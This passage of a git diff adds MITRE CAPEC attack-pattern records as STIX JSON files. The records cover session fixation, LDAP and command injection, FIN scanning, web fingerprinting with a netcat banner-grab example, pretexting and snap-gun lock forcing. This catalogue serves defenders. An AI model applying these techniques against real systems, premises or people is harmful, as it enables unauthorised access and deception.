well as the ability to identify the primitives to be used or manipulated to hijack the thread." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--11b6d192-7c0b-4f9a-a35d-478076c9ae58.json b/capec/attack-pattern/attack-pattern--11b6d192-7c0b-4f9a-a35d-478076c9ae58.json new file mode 100644 index 0000000000..24ea595052 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--11b6d192-7c0b-4f9a-a35d-478076c9ae58.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--252e3455-f592-4f64-9ee2-c2b6cb3937db", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--11b6d192-7c0b-4f9a-a35d-478076c9ae58", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2018-05-31T00:00:00.000Z", + "name": "Alternative Execution Due to Deceptive Filenames", + "description": "The extension of a file name is often used in various contexts to determine the application that is used to open and use it. If an attacker can cause an alternative application to be used, it may be able to execute malicious code, cause a denial of service or expose sensitive information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/635.html", + "external_id": "CAPEC-635" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/162.html", + "external_id": "CWE-162" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The use of the file must be controlled by the file extension." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--11c647fb-33fc-444c-b578-617cb2205def.json b/capec/attack-pattern/attack-pattern--11c647fb-33fc-444c-b578-617cb2205def.json new file mode 100644 index 0000000000..18687ba6b2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--11c647fb-33fc-444c-b578-617cb2205def.json @@ -0,0 +1,82 @@ +{ + "type": "bundle", + "id": "bundle--8ec3e378-f31d-467d-9e65-9b766f0d9276", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--11c647fb-33fc-444c-b578-617cb2205def", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Session Fixation", + "description": "The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/61.html", + "external_id": "CAPEC-61" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html", + "external_id": "CWE-384" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/361.html", + "external_id": "CWE-361" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html", + "external_id": "CWE-664" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html", + "external_id": "CWE-732" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "Consider a banking application that issues a session identifier in the URL to a user before login, and uses the same identifier to identify the customer following successful authentication. An attacker can easily leverage session fixation to access a victim's account by having the victim click on a forged link that contains a valid session identifier from a trapped session setup by the attacker. Once the victim is authenticated, the attacker can take over the session and continue with the same levels of privilege as the victim.", + "An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user's browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels. See also: CVE-2004-2182" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Session identifiers that remain unchanged when the privilege levels change.", + "Permissive session management mechanism that accepts random user-generated session identifiers", + "Predictable session identifiers" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Only basic skills are required to determine and fixate session identifiers in a user's browser. Subsequent attacks may require greater skill levels depending on the attackers' motives." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--11e6e79b-dbf4-4f75-815c-2e7a27176b73.json b/capec/attack-pattern/attack-pattern--11e6e79b-dbf4-4f75-815c-2e7a27176b73.json new file mode 100644 index 0000000000..4ff71e24f2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--11e6e79b-dbf4-4f75-815c-2e7a27176b73.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--9a82eb48-46aa-42df-93dd-9e65d633c09c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--11e6e79b-dbf4-4f75-815c-2e7a27176b73", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Enumerate Mail Exchange (MX) Records", + "description": "An adversary enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/290.html", + "external_id": "CAPEC-290" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "The adversary requires access to a DNS server that will return the MX records for a network." + ], + "x_capec_resources_required": [ + "A command-line utility or other application capable of sending requests to the DNS server is necessary." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--126e4910-37df-4f3b-901a-00b698bc89a0.json b/capec/attack-pattern/attack-pattern--126e4910-37df-4f3b-901a-00b698bc89a0.json new file mode 100644 index 0000000000..41faefffb7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--126e4910-37df-4f3b-901a-00b698bc89a0.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--2570a0c3-4da9-4801-8679-08e013a05091", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--126e4910-37df-4f3b-901a-00b698bc89a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Modify Shared File", + "description": "An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/562.html", + "external_id": "CAPEC-562" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--12786e2f-db8b-4e95-989e-9f6c19357b7e.json b/capec/attack-pattern/attack-pattern--12786e2f-db8b-4e95-989e-9f6c19357b7e.json new file mode 100644 index 0000000000..4f961353aa --- /dev/null +++ b/capec/attack-pattern/attack-pattern--12786e2f-db8b-4e95-989e-9f6c19357b7e.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--1a674f3a-135f-4ee3-bd4a-3b4cabc6ff61", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--12786e2f-db8b-4e95-989e-9f6c19357b7e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Obstruction", + "description": "An attacker obstructs the interactions between system components. By interrupting or disabling these interactions, an adversary can often force the system into a degraded state or even to fail.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/607.html", + "external_id": "CAPEC-607" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ] + }, + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--13f0ca63-0ab3-4b9d-862e-fb90f0193953.json b/capec/attack-pattern/attack-pattern--13f0ca63-0ab3-4b9d-862e-fb90f0193953.json new file mode 100644 index 0000000000..f78f195fb3 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--13f0ca63-0ab3-4b9d-862e-fb90f0193953.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--40320aeb-d711-4f53-a1d0-adad84681435", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--13f0ca63-0ab3-4b9d-862e-fb90f0193953", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Using a Snap Gun Lock to Force a Lock", + "description": "An attacker uses a Snap Gun, also known as a Pick Gun, to force the lock on a building or facility. A Pick Gun is a special type of lock picking instrument that works on similar principles as lock bumping. A snap gun is a hand-held device with an attached metal pick. The metal pick strikes the pins within the lock, transferring motion from the key pins to the driver pins and forcing the lock into momentary alignment. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A Snap Gun exploits this design by using a metal pin to strike all of the key pins at once, forcing the driver pins to shift into an unlocked position. Unlike bump keys or lock picks, a Snap Gun may damage the lock more easily, leaving evidence that the lock has been tampered with.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/394.html", + "external_id": "CAPEC-394" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1408a566-eced-4d5d-aa0d-a7b373e80ea6.json b/capec/attack-pattern/attack-pattern--1408a566-eced-4d5d-aa0d-a7b373e80ea6.json new file mode 100644 index 0000000000..8b34ce9975 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1408a566-eced-4d5d-aa0d-a7b373e80ea6.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--e26ec018-ebf0-47b0-80d6-a295bd7b9dee", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1408a566-eced-4d5d-aa0d-a7b373e80ea6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Command Injection", + "description": "An adversary looking to execute a command of their choosing, injects new items into an existing command thus modifying interpretation away from what was intended. Commands in this context are often standalone strings that are interpreted by a downstream component and cause specific responses. This type of attack is possible when untrusted values are used to build these command strings. Weaknesses in input validation or command construction can enable the attack and lead to successful exploitation.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/248.html", + "external_id": "CAPEC-248" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html", + "external_id": "CWE-77" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (A successful command injection attack enables an adversary to alter the command being executed and achieve a variety of negative consequences depending on the makeup of the new command. This includes potential information disclosure or the corruption of application data.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (A successful command injection attack enables an adversary to alter the command being executed and achieve a variety of negative consequences depending on the makeup of the new command. This includes potential information disclosure or the corruption of application data.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful command injection attack enables an adversary to alter the command being executed and achieve a variety of negative consequences depending on the makeup of the new command. This includes potential information disclosure or the corruption of application data.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must accept input from the user and then use this input in the construction of commands to be executed. In virtually all cases, this is some form of string input that is concatenated to a constant string defined by the application to form the full command to be executed." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464.json b/capec/attack-pattern/attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464.json new file mode 100644 index 0000000000..3bb5cea00b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464.json @@ -0,0 +1,89 @@ +{ + "type": "bundle", + "id": "bundle--8037c9ba-ef3a-49bc-83bd-50f22b23a9b1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "LDAP Injection", + "description": "An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/136.html", + "external_id": "CAPEC-136" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html", + "external_id": "CWE-77" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/90.html", + "external_id": "CWE-90" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "reference_from_CAPEC", + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "url": "http://projects.webappsec.org/LDAP-Injection", + "external_id": "REF-17" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack. See also: CVE-2005-2301" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in LDAP queries in the user input, and insert the user-supplied string in an LDAP query which is then processed." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of LDAP, especially its query syntax." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--144a290f-2a70-44b5-8cc3-41ba515b40d3.json b/capec/attack-pattern/attack-pattern--144a290f-2a70-44b5-8cc3-41ba515b40d3.json new file mode 100644 index 0000000000..e2fc6058c7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--144a290f-2a70-44b5-8cc3-41ba515b40d3.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--55eab144-07ab-4434-a97d-ca1bb151d9f1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--144a290f-2a70-44b5-8cc3-41ba515b40d3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP FIN Scan", + "description": "An adversary uses a TCP FIN scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the FIN bit set in the packet header. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow the adversary to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. In addition to its relative speed in comparison with other types of scans, the major advantage a TCP FIN Scan is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. FIN packets, like out-of-state ACK packets, tend to pass through such devices undetected. Many operating systems, however, do not implement RFC 793 exactly and for this reason FIN scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports. FIN scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, FIN scanning a system protected by a stateful firewall may indicate all ports being open. For these reasons, FIN scanning results must always be interpreted as part of a larger scanning strategy. FIN scanning is still relatively stealthy as the packets tend to blend in with the background noise on a network link. FIN scans are detected via heuristic (non-signature) based algorithms, much in the same way as other scan types are detected.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/302.html", + "external_id": "CAPEC-302" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-147" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "FIN scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges." + ], + "x_capec_resources_required": [ + "This attack pattern requires the ability to send TCP FIN segments to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--147a86db-2e5f-42ef-beaf-c373d5804bfd.json b/capec/attack-pattern/attack-pattern--147a86db-2e5f-42ef-beaf-c373d5804bfd.json new file mode 100644 index 0000000000..7d321ca012 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--147a86db-2e5f-42ef-beaf-c373d5804bfd.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--6c648dab-3f4e-4c80-961c-83ea84525069", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--147a86db-2e5f-42ef-beaf-c373d5804bfd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Delivery Person", + "description": "An adversary engages in pretexting behavior, assuming the role of a delivery person, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. Impersonating a delivery person is an effective attack and an easy attack since not much acting is involved. Usually the hardest part is looking the part and having all of the proper credentials, papers and \"deliveries\" in order to be able to pull it off.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/414.html", + "external_id": "CAPEC-414" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--14a0044a-5ad1-43ac-bfa7-fed04b908c18.json b/capec/attack-pattern/attack-pattern--14a0044a-5ad1-43ac-bfa7-fed04b908c18.json new file mode 100644 index 0000000000..7de3d895ee --- /dev/null +++ b/capec/attack-pattern/attack-pattern--14a0044a-5ad1-43ac-bfa7-fed04b908c18.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--b09aebbc-594f-4ad4-801f-704fb16a7e04", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--14a0044a-5ad1-43ac-bfa7-fed04b908c18", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Phone", + "description": "An adversary engages in pretexting behavior, assuming some sort of trusted role, and contacting the targeted individual or organization via phone to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. This is the most common social engineering attack. Some of the most commonly effective approaches are to impersonate a fellow employee, impersonate a computer technician or to target help desk personnel.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/415.html", + "external_id": "CAPEC-415" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe.json b/capec/attack-pattern/attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe.json new file mode 100644 index 0000000000..fb6d8cd14d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--e143b97f-11b1-4e12-955e-8ae323cdcac0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Web Application Fingerprinting", + "description": "An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/170.html", + "external_id": "CAPEC-170" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/497.html", + "external_id": "CWE-497" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Saumil Shah, An Introduction to HTTP fingerprinting", + "url": "http://www.net-square.com/httprint_paper.html", + "external_id": "REF-36" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Testing Guide (v4 [DRAFT]), The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Testing_for_Web_Application_Fingerprint_%28OWASP-IG-004%29", + "external_id": "REF-37" + }, + { + "source_name": "reference_from_CAPEC", + "description": "HTTP 1.1 Specification (RFC 2616), IETF RFC", + "url": "http://www.ietf.org/rfc/rfc2616.txt", + "external_id": "REF-38" + }, + { + "source_name": "reference_from_CAPEC", + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "url": "http://projects.webappsec.org/Fingerprinting", + "external_id": "REF-39" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Other (Information Leakage)" + ] + }, + "x_capec_example_instances": [ + "\n An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.\n \n Response from Apache 1.3.23$ nc apache.server.com80 GET / HTTP/3.0\n HTTP/1.1 400 Bad RequestDate: Sun, 15 Jun 2003 17:12: 37 GMTServer: Apache/1.3.23Connection: closeTransfer: chunkedContent-Type: text/HTML; charset=iso-8859-1\n \n Response from IIS 5.0$ nc iis.server.com 80GET / HTTP/3.0\n HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:14: 02 GMTContent-Type: text/HTMLAccept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMTETag: W/e0d362a4c335be1: ae1Content-Length: 133\n [R.170.2]\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Any web application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack." + ], + "x_capec_resources_required": [ + "While simple fingerprinting can be accomplished with only a web browser, for more thorough fingerprinting an attacker requires a variety of tools to collect information about the target. These tools might include protocol analyzers, web-site crawlers, and fuzzing tools. Footprinting a service adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected." + ], + "x_capec_skills_required": { + "Low": "Attacker knows how to send HTTP request, SQL query to a web application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1513b3b5-9e47-4a77-ada3-bd85b535fa12.json b/capec/attack-pattern/attack-pattern--1513b3b5-9e47-4a77-ada3-bd85b535fa12.json new file mode 100644 index 0000000000..e2bbfc2aae --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1513b3b5-9e47-4a77-ada3-bd85b535fa12.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": 